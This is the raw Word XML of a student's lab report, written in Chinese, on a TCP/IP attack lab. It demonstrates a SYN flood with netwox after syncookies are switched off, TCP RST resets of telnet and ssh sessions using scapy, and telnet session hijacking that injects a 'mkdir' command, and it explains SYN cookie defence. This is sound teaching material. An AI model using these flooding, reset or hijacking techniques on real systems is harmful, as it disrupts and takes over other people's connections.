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7A87D" w14:textId="5E57685B" w:rsidR="00F80E6E" w:rsidRPr="00AC7E54" w:rsidRDefault="00433006" w:rsidP="00433006">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>TCP/IP Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4B5B99" w14:textId="7F98E2A9" w:rsidR="00433006" w:rsidRPr="00433006" w:rsidRDefault="00433006" w:rsidP="00433006">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433006">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00433006">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>71171</w:t>
      </w:r>
      <w:r w:rsidR="00AC7E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00AC7E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>马鸣宇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C3ACC8" w14:textId="0F970AFE" w:rsidR="00433006" w:rsidRPr="00AC7E54" w:rsidRDefault="00433006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>Task 1: SYN Flooding Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D7530" w14:textId="4B7858FE" w:rsidR="00433006" w:rsidRDefault="00433006">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用宿主机和2台虚拟机作为实验平台：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FAEE2D" w14:textId="4CA76D67" w:rsidR="00433006" w:rsidRDefault="00433006">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="129FBED1" wp14:editId="2B2885F2">
            <wp:extent cx="5270500" cy="1118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1 下午20.49.08 下午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61D" w14:textId="7138B7E7" w:rsidR="00433006" w:rsidRDefault="00433006">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="513FA9B2" wp14:editId="36B8F917">
            <wp:extent cx="5270500" cy="1236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1 下午20.49.21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CE0" w14:textId="08FA957D" w:rsidR="00433006" w:rsidRDefault="00433006">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776B37DA" wp14:editId="306760D5">
            <wp:extent cx="5270500" cy="1233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1 下午20.49.28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22D" w14:textId="57342B90" w:rsidR="00433006" w:rsidRDefault="00433006">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用第二个虚拟机攻击第三个虚拟机，使用宿主机来进行观察</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DFAA52" w14:textId="39E9D6ED" w:rsidR="00AC7E54" w:rsidRDefault="00AC7E54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6A2DD92" wp14:editId="5AE704A2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3205480" cy="982980"/>
            <wp:effectExtent l="0" t="0" r="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1 下午21.07.57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A223E" w14:textId="0EBBB576" w:rsidR="00AC7E54" w:rsidRDefault="00AC7E54"/>
    <w:p w14:paraId="3DA8AE60" w14:textId="2338177D" w:rsidR="00433006" w:rsidRDefault="00433006">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先查看当前套接字队列：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF90680" w14:textId="49C9CFA3" w:rsidR="00433006" w:rsidRDefault="00433006"/>
    <w:p w14:paraId="7FDB89EF" w14:textId="6B1086F8" w:rsidR="00AC7E54" w:rsidRDefault="00AC7E54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B452B9A" wp14:editId="7416C70F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274060" cy="1229995"/>
            <wp:effectExtent l="0" t="0" r="2540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11 下午21.09.12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F0629" w14:textId="520A2A95" w:rsidR="00B041F2" w:rsidRDefault="00B041F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时宿主机可以使用Telnet连接第三个虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E019DD4" w14:textId="42631DEA" w:rsidR="00B041F2" w:rsidRDefault="00B041F2"/>
    <w:p w14:paraId="22E839A4" w14:textId="77777777" w:rsidR="00AC7E54" w:rsidRDefault="00AC7E54"/>
    <w:p w14:paraId="1E99829F" w14:textId="28DF8B1A" w:rsidR="00B041F2" w:rsidRPr="00AC7E54" w:rsidRDefault="00B041F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭防御：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w net.ipv4.tcp_syncookies=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BCD9D4" w14:textId="3C6DE6BD" w:rsidR="00B041F2" w:rsidRPr="00AC7E54" w:rsidRDefault="00B041F2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后发起SYN泛洪攻击：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>etwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 76 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC7E54">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.105 -p 23 -s raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C33F34A" w14:textId="53B904F2" w:rsidR="00B041F2" w:rsidRDefault="00B041F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时第三台虚拟机中查看套接字队列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFA1A2" w14:textId="5F39ADFC" w:rsidR="00B041F2" w:rsidRDefault="00B041F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55550719" wp14:editId="67296ABF">
            <wp:extent cx="5270500" cy="29838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1 下午21.13.36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7C5" w14:textId="5A99DDB7" w:rsidR="00B041F2" w:rsidRDefault="00B041F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有很多状态为SYN</w:t>
      </w:r>
      <w:r>
        <w:t>_RECV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的连接，它们发出一次握手请求后就不再回应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37488F56" w14:textId="6EB11DC9" w:rsidR="00AC7E54" w:rsidRDefault="00AC7E54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5930E1C" wp14:editId="1BD08D40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3083560" cy="80010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1 下午21.14.49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DBA20D" w14:textId="6251943F" w:rsidR="001E65FD" w:rsidRDefault="001E65FD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时Telnet无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455FADDC" w14:textId="7CAB7AD9" w:rsidR="00AC7E54" w:rsidRDefault="00AC7E54"/>
    <w:p w14:paraId="5994D54F" w14:textId="77777777" w:rsidR="00AC7E54" w:rsidRDefault="00AC7E54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31838865" w14:textId="40E05569" w:rsidR="00B041F2" w:rsidRDefault="00B041F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie防御，再次攻击，并使用宿主机观察</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939733C" w14:textId="2A899F28" w:rsidR="00B041F2" w:rsidRDefault="00AC7E54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06500AF" wp14:editId="7E981095">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2133600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>66675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2999740" cy="393700"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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11 下午21.19.13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41F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现可以正常</w:t>
      </w:r>
      <w:r w:rsidR="00060EC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD2102" w14:textId="5356B648" w:rsidR="00060EC2" w:rsidRDefault="00060EC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新查看套接字队列：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B120E9" w14:textId="7087F331" w:rsidR="00060EC2" w:rsidRDefault="00060EC2"/>
    <w:p w14:paraId="4BA6AA17" w14:textId="0BD7E3D0" w:rsidR="00060EC2" w:rsidRDefault="00060EC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在有大量SYN-</w:t>
      </w:r>
      <w:r>
        <w:t>RECV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>套接字的同时，Telnet连接顺利建立了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B4F84" w14:textId="4A0356C6" w:rsidR="00060EC2" w:rsidRDefault="00060EC2">
      <w:r w:rsidRPr="00060EC2">
        <w:t>SYN Cookie是对TCP服务器端的三次握手协议作一些修改，专门用来防范SYN Flood攻击的一种手段。它的原理是，在TCP服务器收到TCP SYN包并返回TCP SYN+ACK包时，不分配一个专门的数据区，而是根据这个SYN包计算出一个cookie值。在收到TCP ACK包时，TCP服务器在根据那个cookie值检查这个TCP ACK包的合法性。如果合法，再分配专门的数据区进行处理未来的TCP连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24CF4E" w14:textId="5AC37CCF" w:rsidR="00060EC2" w:rsidRPr="00AC7E54" w:rsidRDefault="001E65FD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Task 2: TCP RST Attacks on telnet and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C9A10" w14:textId="62A885E1" w:rsidR="00AC7E54" w:rsidRDefault="00EB5844">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个和第三个虚拟机建立Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01851E" w14:textId="549C810D" w:rsidR="00EB5844" w:rsidRDefault="00EB5844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14:paraId="76B772BC" w14:textId="130FB541" w:rsidR="00EB5844" w:rsidRDefault="00AC7E54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C810F0" wp14:editId="5CA936C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743200" cy="1022985"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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1 下午21.38.57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5844">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个虚拟机IP：1</w:t>
      </w:r>
      <w:r w:rsidR="00EB5844">
        <w:t>92.168.1.101</w:t>
      </w:r>
      <w:r w:rsidR="00EB5844">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，端口</w:t>
      </w:r>
      <w:r w:rsidR="00EB5844">
        <w:t>51432</w:t>
      </w:r>
      <w:r w:rsidR="00EB5844">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下一个seq值为3</w:t>
      </w:r>
      <w:r w:rsidR="00EB5844">
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BDD3F9" w14:textId="7B40D3EB" w:rsidR="00EB5844" w:rsidRDefault="00EB5844">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三个虚拟机IP：1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.1.105</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，端口2</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下一个seq值为2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010EDF07" w14:textId="14773A1A" w:rsidR="00EB5844" w:rsidRDefault="00EB5844">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29279303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6E3FB1D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=IP(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.1.101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，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.1.105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1C9606C2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TCP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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51432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23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flags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RA”,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seq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ack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38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28DF3F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pkt=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</w:p>
    <w:p w14:paraId="5AD4A950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ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA59F5F" w14:textId="6BDFA4E6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send(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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32F89AD" w14:textId="3391D293" w:rsidR="000964EF" w:rsidRDefault="000964EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行Python脚本后，Telnet连接中断。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C48332E" w14:textId="3EC13777" w:rsidR="000964EF" w:rsidRDefault="000964EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用相同方法攻击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连接也奏效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15799EAF" w14:textId="6FA3072A" w:rsidR="000964EF" w:rsidRDefault="000964EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是因为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不加密报文头部，我们仍然可以通过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获取到IP，端口号，s</w:t>
      </w:r>
      <w:r>
        <w:t>eq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和ack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56D0FD" w14:textId="327790E3" w:rsidR="00AB1D94" w:rsidRPr="00AC7E54" w:rsidRDefault="00AB1D94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>Task 4: TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8CCB4" w14:textId="337B70C5" w:rsidR="00EE4242" w:rsidRDefault="00EE4242">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先建立Telnet连接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A761A16" w14:textId="719F5C95" w:rsidR="00EE4242" w:rsidRDefault="00AC7E54">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="572A9724" wp14:editId="09AFAC8E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251200" cy="538480"/>
            <wp:effectExtent l="0" t="0" r="635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1 下午22.04.06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3DEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口分别为5</w:t>
      </w:r>
      <w:r w:rsidR="007F3DEC">
        <w:t>6352</w:t>
      </w:r>
      <w:r w:rsidR="007F3DEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="007F3DEC">
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="007F3DEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发起者下一个seq</w:t>
      </w:r>
      <w:r w:rsidR="007F3DEC">
        <w:t>=98</w:t>
      </w:r>
      <w:r w:rsidR="007F3DEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，接受者下一个seq</w:t>
      </w:r>
      <w:r w:rsidR="007F3DEC">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00E71DEB">
        <w:t>104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679EFA27" w14:textId="0756B89D" w:rsidR="00E71DEB" w:rsidRDefault="00E71DEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写Python脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6DD3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57C10AA7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IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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.1.103”,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.1.105”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C27EC3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TCP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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56352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23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flags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PA”,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seq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98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ack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104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785CD5D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payload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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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test”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63245069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pkt=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/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DAE1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ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF97ED" w14:textId="12A4466B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send(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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0A568D84" w14:textId="2EBBF44D" w:rsidR="00E71DEB" w:rsidRPr="00E71DEB" w:rsidRDefault="00E71DEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功攻击后，会在被攻击的虚拟机目录下找到test文件夹。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E71DEB" w:rsidRPr="00E71DEB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DC1"/>
    <w:rsid w:val="00060EC2"/>
    <w:rsid w:val="00077042"/>
    <w:rsid w:val="000964EF"/>
    <w:rsid w:val="001E65FD"/>
    <w:rsid w:val="00433006"/>
    <w:rsid w:val="0070323B"/>
    <w:rsid w:val="007F3DEC"/>
    <w:rsid w:val="00A911F4"/>
    <w:rsid w:val="00AB1D94"/>
    <w:rsid w:val="00AC7E54"/>
    <w:rsid w:val="00B041F2"/>
    <w:rsid w:val="00CC6E8A"/>
    <w:rsid w:val="00E71DEB"/>
    <w:rsid w:val="00E76DC1"/>
    <w:rsid w:val="00EB5844"/>
    <w:rsid w:val="00EE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E380"/>
  <w14:defaultImageDpi w14:val="32767"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1BDC100B-4CFD-C24D-A346-0E927F22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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-13T01:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-13T01:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>